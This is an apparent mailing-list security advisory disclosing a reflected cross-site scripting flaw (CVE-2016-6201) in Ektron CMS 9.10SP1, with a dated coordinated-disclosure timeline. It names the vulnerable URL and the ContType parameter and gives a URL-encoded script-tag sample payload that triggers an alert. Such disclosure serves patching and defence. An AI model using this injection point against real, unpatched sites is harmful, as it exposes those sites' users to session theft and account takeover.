Ektron Version 9.10SP1(Build 9.1.0.184) Cross Site Scripting

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



# Vulnerability type: Cross Site Scripting
# Vendor: Ektron
# Product: Ektron Content Management System
# Affected version:  9.10SP1(Build 9.1.0.184)
# Patched version: 9.1.0.184SP3(9.1.0.184.3.127)
# Credit: Siyavash Ghasseminia 
# CVE ID: CVE-2016-6201

# PROOF OF CONCEPT

Vulnerable URL:
/WorkArea/content.aspx?id=0&action=ViewContentByCategory&LangType=1033&ContType=zjgsa&SubType=0

# VULNERABLE PARAMETERS:
- ContType


# SAMPLE PAYLOAD
- %22%3E%3Cscript%3Ealert(1234567890)%3C%2fscript%3Eumarp


# TIMELINE
- 1/7/2016: Vulnerability found
- 4/7/2016: Vendor informed
- 13/7/2016: Vendor responded and acknowledged
- 29/7/2016: Vendor fixed the issue
- 19/6/2017: Public disclosure



[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux